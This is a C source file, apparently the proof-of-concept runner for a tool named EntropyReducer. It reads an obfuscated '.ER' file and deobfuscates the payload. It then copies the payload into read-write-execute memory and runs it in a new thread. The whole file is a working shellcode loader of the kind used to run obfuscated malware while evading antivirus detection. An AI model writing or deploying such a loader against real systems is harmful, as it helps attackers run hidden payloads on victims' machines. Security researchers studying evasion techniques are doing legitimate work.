PoC/main.c

/*
	program that will read a .ER file (generated by 'EntropyReducer.exe' and run it)
*/

#include <Windows.h>
#include <stdio.h>

#include "EntropyReducer.h"



BOOL ReportError(const char* ApiName) {
	printf("[!] \"%s\" [ FAILED ] \t%d \n", ApiName, GetLastError());
	return FALSE;
}


int main(int argc, char* argv[]) {

	if (!(argc >= 2)) {
		printf("[!] Please Specify Input '.ER' File To Run ... \n");
		return -1;
	}
	
	printf("[i] BUFF_SIZE : [ 0x%0.4X ] - NULL_BYTES : [ 0x%0.4X ]\n", BUFF_SIZE, NULL_BYTES);


	HANDLE	hFile					= INVALID_HANDLE_VALUE,
			hThread					= NULL;
	DWORD	dwFileSize				= NULL;
	DWORD	dwNumberOfBytesRead		= NULL;
	PBYTE	pBuffer					= NULL;

	hFile = CreateFileA((LPCSTR)argv[1], GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hFile == INVALID_HANDLE_VALUE)
		return ReportError("CreateFileA");

	if ((dwFileSize = GetFileSize(hFile, NULL)) == INVALID_FILE_SIZE)
		return ReportError("GetFileSize");

	pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize);
	if (!pBuffer)
		return ReportError("HeapAlloc");

	if (!ReadFile(hFile, pBuffer, dwFileSize, &dwNumberOfBytesRead, NULL) || dwNumberOfBytesRead != dwFileSize) {
		printf("[i] Read %ld from %ld Bytes \n", dwNumberOfBytesRead, dwFileSize);
		return ReportError("ReadFile");
	}

	CloseHandle(hFile);

//-------------------------------------------------------------------------------------------------------------

	SIZE_T	DeobfuscatedPayloadSize		= NULL;
	PBYTE	DeobfuscatedPayloadBuffer	= NULL;

	printf("[i] Deobfuscating \"%s\" ... ", argv[1]);
	if (!Deobfuscate(pBuffer, dwFileSize, &DeobfuscatedPayloadBuffer, &DeobfuscatedPayloadSize)) {
		return -1;
	}
	printf("[+] DONE \n");
	printf("\t>>> Deobfuscated Payload Size : %ld \n\t>>> Deobfuscated Payload Located At : 0x%p \n", DeobfuscatedPayloadSize, DeobfuscatedPayloadBuffer);

//-------------------------------------------------------------------------------------------------------------


	printf("[$] Press <Enter> To Run ... ");
	getchar();

	PVOID pExecAddress = VirtualAlloc(NULL, DeobfuscatedPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!pExecAddress)
		return ReportError("VirtualAlloc");

	memcpy(pExecAddress, DeobfuscatedPayloadBuffer, DeobfuscatedPayloadSize);

	printf("[i] Running Payload Thread ... ");

	hThread = CreateThread(NULL, NULL, pExecAddress, (PVOID)"pew pew", NULL, NULL);
	if (!hThread)
		return ReportError("CreateThread");

	WaitForSingleObject(hThread, INFINITE);
	
	printf("[+] DONE \n");

	return 0;
}
